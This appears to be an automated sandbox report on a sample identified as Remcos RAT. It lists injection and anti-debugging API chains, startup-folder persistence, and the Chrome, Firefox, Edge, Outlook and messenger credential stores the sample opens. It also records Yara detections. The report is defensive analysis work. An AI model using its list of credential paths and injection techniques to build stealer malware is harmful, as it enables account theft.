Code function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

2_2_00406F06

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007342DE

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Graff.exe, 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv4482.tmp.4.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: bhv4482.tmp.4.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: wscript.exe, 00000009.00000002.1478573354.0000026E7F513000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-p

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	API call chain: ExitProcess graph end node	graph_0-33883
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	API call chain: ExitProcess graph end node	graph_2-86089
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_00762622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00762622

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

4_2_0040DD85

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007342DE

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00754CE8 mov eax, dword ptr fs:[00000030h]	0_2_00754CE8
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_01720440 mov eax, dword ptr fs:[00000030h]	0_2_01720440
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_017204A0 mov eax, dword ptr fs:[00000030h]	0_2_017204A0
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0171EE30 mov eax, dword ptr fs:[00000030h]	0_2_0171EE30
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0171EE1E mov eax, dword ptr fs:[00000030h]	0_2_0171EE1E
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00442554 mov eax, dword ptr fs:[00000030h]	2_2_00442554
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00894CE8 mov eax, dword ptr fs:[00000030h]	2_2_00894CE8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10004AB4 mov eax, dword ptr fs:[00000030h]	2_2_10004AB4
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0147A170 mov eax, dword ptr fs:[00000030h]	2_2_0147A170
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0147A110 mov eax, dword ptr fs:[00000030h]	2_2_0147A110
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_01478B00 mov eax, dword ptr fs:[00000030h]	2_2_01478B00
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_01478AEE mov eax, dword ptr fs:[00000030h]	2_2_01478AEE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00442554 mov eax, dword ptr fs:[00000030h]	10_2_00442554
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FD898 mov eax, dword ptr fs:[00000030h]	10_2_017FD898
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FD886 mov eax, dword ptr fs:[00000030h]	10_2_017FD886
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FEF08 mov eax, dword ptr fs:[00000030h]	10_2_017FEF08
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_017FEEA8 mov eax, dword ptr fs:[00000030h]	10_2_017FEEA8

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00410B19 GetNativeSystemInfo,GetProcessHeap,RtlAllocateHeap,SetLastError,SetLastError,

2_2_00410B19

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00762622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00762622
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0075083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0075083F
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007509D5 SetUnhandledExceptionFilter,	0_2_007509D5
Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_00750C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00750C21
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00434168
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0043A65D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00433B44
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00433CD7 SetUnhandledExceptionFilter,	2_2_00433CD7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008A2622
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0089083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0089083F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_008909D5 SetUnhandledExceptionFilter,	2_2_008909D5
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00890C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00890C21
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_100060E2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10002639
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10002B1C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00434168
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0043A65D
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00433B44
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00433CD7 SetUnhandledExceptionFilter,	10_2_00433CD7

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

2_2_00417245

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\misruling\Graff.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\misruling\Graff.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\misruling\Graff.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		2_2_00410F36
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		10_2_00410F36

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_0074F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_0074F98E

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00418754 mouse_event,

2_2_00418754

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\molcoacbwimigbrwpmuqe"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\wiznptnvkrevjhgaywhspkne"	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe C:\Users\user\AppData\Local\misruling\Graff.exe /stext "C:\Users\user\AppData\Local\Temp\zlegpdywxzwztnceqhblsxavxvk"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\misruling\Graff.exe "C:\Users\user\AppData\Local\misruling\Graff.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_00791663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00791663

Source: bwYw3UUfy7.exe, 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmp, Graff.exe, 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmp, Graff.exe, 0000000A.00000002.1511230717.0000000000932000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: Graff.exe, 00000002.00000003.1397075214.0000000001442000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Graff.exe, 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerRT
Source: bwYw3UUfy7.exe, Graff.exe	Binary or memory string: Shell_TrayWnd
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerDH\+
Source: Graff.exe, 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0.26:3678
Source: Graff.exe, 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerIW
Source: Graff.exe, 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerlW
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager7
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerinutes }
Source: Graff.exe, 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager-WX
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerGd
Source: Graff.exe, 00000002.00000002.3741371682.0000000001499000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: Graff.exe, 00000002.00000003.1397075214.0000000001442000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager981d4d
Source: Graff.exe, 00000002.00000002.3740170778.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerDH\%
Source: Graff.exe, 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_00750698 cpuid

0_2_00750698

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	2_2_004470AE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	2_2_004510BA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004511E3
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	2_2_004512EA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_004513B7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	2_2_00447597
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoA,	2_2_0040E679
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00450A7F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	2_2_00450CF7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	2_2_00450D42
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	2_2_00450DDD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00450E6A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	10_2_004470AE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	10_2_004510BA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_004511E3
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	10_2_004512EA
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_004513B7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,	10_2_00447597
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoA,	10_2_0040E679
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	10_2_00450A7F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	10_2_00450CF7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	10_2_00450D42
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: EnumSystemLocalesW,	10_2_00450DDD
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_00450E6A

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_00750A9D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00750A9D

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_0041A7A2 GetComputerNameExW,GetUserNameW,

2_2_0041A7A2

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

2_2_0044800F

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_007342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007342DE

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		2_2_0040B21B
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		10_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	2_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \key3.db	2_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	10_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: \key3.db	10_2_0040B335

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: ESMTPPassword	6_2_004033F0
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	6_2_00402DB3
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	6_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7924, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH			Jump to behavior
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH			Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
